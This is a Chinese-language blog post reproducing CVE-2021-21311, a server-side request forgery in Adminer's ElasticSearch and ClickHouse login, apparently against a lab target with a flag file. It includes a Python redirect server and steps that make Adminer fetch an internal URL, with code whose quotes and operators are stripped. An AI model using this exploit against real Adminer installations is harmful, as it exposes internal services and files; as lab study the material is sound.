Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞(CVE-2021-21311)复现

张开发
2026/4/13 21:52:59 15 分钟阅读

分享文章

Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞(CVE-2021-21311)复现
Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞CVE-2021-21311Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在其4.0.0到4.7.9版本之间连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF。漏洞复现靶机启动后在http://your-ip:80即可查看到Adminer的登录页面。漏洞利用在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写example.com点击登录即可看到example.com返回的400错误页面展示在页面中使用python3写一段脚本使用http服务监听1111端口设置重定向到http://192.168.2.47:80/flag.txt读取flag文件import http.server import socketserver class RedirectHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # 设置重定向到指定URL self.send_response(301) # 301: 永久重定向 self.send_header(Location, http://192.168.2.47:80/flag.txt) # 设置重定向地址 self.end_headers() def run(server_classhttp.server.HTTPServer, handler_classRedirectHandler): server_address (, 1111) # 监听1111端口 httpd server_class(server_address, handler_class) print(Server running on port 80...) httpd.serve_forever() if __name__ __main__: run()运行脚本监听1111端口python3 exploit.py Server running on port 1111...网页上输入服务器192.168.2.6:1111用户名root密码随机然后点登陆漏洞利用成功可以看到页面上就显示了flag.txt文件的内容。

更多文章